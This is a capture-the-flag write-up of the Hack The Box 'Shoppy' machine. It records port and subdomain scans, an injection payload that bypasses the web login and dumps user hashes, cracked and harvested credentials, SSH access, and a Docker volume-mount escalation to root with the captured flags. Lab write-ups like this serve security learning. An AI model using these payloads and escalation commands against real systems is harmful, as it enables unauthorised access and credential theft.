HTB Shoppy done
Shoppy¶
Notes¶
OS:¶
Linux
Technology:¶
go1.18.1
IP Address:¶
10.129.227.233
Open ports:¶
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.23.1
9093/tcp open http Golang net/http server
Users and pass:¶
From: http://shoppy.htb/admin
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
cracked password: ---
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
cracked password: remembermethisway
---
From: http://mattermost.shoppy.htb/shoppy/channels/deploy-machine
username: jaeger
password: Sh0ppyBest@pp!
---
From /home/deploy/password-manager
username: deploy
password: Deploying@pp!
---
Nmap¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.227.233_nmap 10.129.227.233 ; cat 10.129.227.233_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 11:26 CEST
Nmap scan report for 10.129.227.233
Host is up (0.038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Tue, 22 Apr 2025 09:27:40 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 4
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 4
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.2843e-05
| go_gc_duration_seconds{quantile="0.25"} 4.2269e-05
|_ go_gc_dur
Add IP to /etc/hosts¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ cat /etc/hosts | tail -n1
10.129.227.233 shoppy.htb
Ffuz: http://shoppy.htb/¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ffuf -u http://shoppy.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o shoppy.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : shoppy.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 34ms]
Admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 45ms]
Login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 55ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 36ms]
assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 38ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/assets/FUZZ
css [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 35ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/css/FUZZ
exports [Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 41ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/exports/FUZZ
favicon.ico [Status: 200, Size: 213054, Words: 56, Lines: 89, Duration: 48ms]
fonts [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 40ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/fonts/FUZZ
images [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 37ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/images/FUZZ
js [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 39ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/js/FUZZ
login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 45ms]
[INFO] Starting queued job on target: http://shoppy.htb/assets/FUZZ
css [Status: 301, Size: 187, Words: 7, Lines: 11, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/css/
fonts [Status: 301, Size: 191, Words: 7, Lines: 11, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/fonts/
img [Status: 301, Size: 187, Words: 7, Lines: 11, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/img/
js [Status: 301, Size: 185, Words: 7, Lines: 11, Duration: 37ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/js/
[INFO] Starting queued job on target: http://shoppy.htb/css/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/exports/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/fonts/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/images/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/js/FUZZ
:: Progress: [163752/163752] :: Job [7/7] :: 980 req/sec :: Duration: [0:03:01] :: Errors: 0 ::
Ffuz subdomain: http://shoppy.htb¶
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ffuf -u http://shoppy.htb -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o shoppy.htb_ffuz_subdomain | grep -v 169
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Output file : shoppy.htb_ffuz_subdomain
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
mattermost [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 143ms]
:: Progress: [100000/100000] :: Job [1/1] :: 956 req/sec :: Duration: [0:01:41] :: Errors: 0 ::
````
# Add subdomain to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy] └─$ cat /etc/hosts | tail -n1 10.129.227.233 shoppy.htb mattermost.shoppy.htb
# SQLi - http://shoppy.htb/login
POST /login HTTP/1.1 Host: shoppy.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 41 Origin: http://shoppy.htb Connection: keep-alive Referer: http://shoppy.htb/login Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX1%2BpefoBXQAM%2BkfYT%2F8HeWLCRk7icmMeO4P09Stpf%2F8%2FYOYtUusflS%2B4; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX1%2BtedtVziuNFjHQBQ8kegmnLwcI2b3Xx7h7QvH7AVLTIJ9PYS6fqI9rn8pIiaA5vjVmNUs2YQPyGQ%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX18w0KLES6gq58DtB8T6E1J%2BCIyJNdiKBs4%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX19qM2aCN37EowDCClirJ2rXgv5XC2s4Xkc%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX1%2FL5u0nLaLgy%2FVscFCisBYTSnGiux0RhgU%3D Upgrade-Insecure-Requests: 1 Priority: u=0, i
username=admin'+||+'a'=='a&password=bbb¶
HTTP/1.1 302 Found Server: nginx/1.23.1 Date: Tue, 22 Apr 2025 11:55:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 56 Connection: keep-alive Location: /admin Vary: Accept Set-Cookie: connect.sid=s%3ADJE18og3r5Om-H_9uQy62RhGBbsKa-IJ.gOedsMQpmqyATk1QxW%2FEqns0fGagz4dHsHTsLhuZ2h0; Path=/; HttpOnly
Found. Redirecting to /admin
# Second SQLi after bypass admin login: http://shoppy.htb/admin
http://shoppy.htb/admin¶
http://shoppy.htb/admin/search-users
Get info about logins and passwords Payload: admin' || 'a'=='a
0
_id "62db0e93d6d6a999a66ee67a"
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
1
_id "62db0e93d6d6a999a66ee67b"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
# Cracking passwords
username "admin" password "23c6877d9e2b564ef8b32c3a23de27b2" cracked password: ---
username "josh" password "6ebcea65320589ca4f2f1ce039975995" cracked password: remembermethisway
# Get creds from website: http://mattermost.shoppy.htb/shoppy/channels/deploy-machine
Login to website http://mattermost.shoppy.htb with creds: username: josh password: remembermethisway
http://mattermost.shoppy.htb/shoppy/channels/deploy-machine username: jaeger password: Sh0ppyBest@pp!
# Read flag: user.txt
username: jaeger password: Sh0ppyBest@pp!
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy] └─$ ssh [email protected] The authenticity of host '10.129.227.233 (10.129.227.233)' can't be established. ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.129.227.233' (ED25519) to the list of known hosts. [email protected]'s password: Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jaeger@shoppy:~$ jaeger@shoppy:~$ find / -name "user.txt" 2>/dev/null /home/jaeger/user.txt jaeger@shoppy:~$ jaeger@shoppy:~$ cat /home/jaeger/user.txt 2372108c839ac2951a4fb7a6b7e42647 jaeger@shoppy:~$
# sudoers for user
jaeger@shoppy:/home/deploy$ id uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger) jaeger@shoppy:/home/deploy$ jaeger@shoppy:/home/deploy$ sudo -l Matching Defaults entries for jaeger on shoppy: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy: (deploy) /home/deploy/password-manager jaeger@shoppy:/home/deploy$ jaeger@shoppy:/home/deploy$ file /home/deploy/password-manager /home/deploy/password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped jaeger@shoppy:/home/deploy$ ls -la /home/deploy/password-manager -rwxr--r-- 1 deploy deploy 18440 Jul 22 2022 /home/deploy/password-manager jaeger@shoppy:/home/deploy$ jaeger@shoppy:/home/deploy$
# Privilege Escalation
## Get another creds from /home/deploy/password-manager
username: deploy password: Deploying@pp!
jaeger@shoppy:/home/deploy$ strings -eb /home/deploy/password-manager Sample jaeger@shoppy:/home/deploy$ jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager Welcome to Josh password manager! Please enter your master password: Sample Access granted! Here is creds ! Deploy Creds : username: deploy password: Deploying@pp! jaeger@shoppy:/home/deploy$
## SSH login as user: deploy
username: deploy password: Deploying@pp!
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy] └─$ ssh [email protected] [email protected]'s password: Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. $ id uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker) $ $
# Read flag: root.txt
$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES $ $ docker iamges docker: 'iamges' is not a docker command. See 'docker --help' $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE alpine latest d7d3d98c851f 2 years ago 5.53MB $ $ docker run --rm -it -v /:/mnt alpine chroot /mnt sh
¶
id¶
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
¶
cd /root/¶
ls¶
root.txt
¶
cat root.txt¶
64cdbfbcf85bad01b05e9ba52cf32e48
$¶
# References
https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html#shell-as-deploy
# Lessons Learned
# Tags
```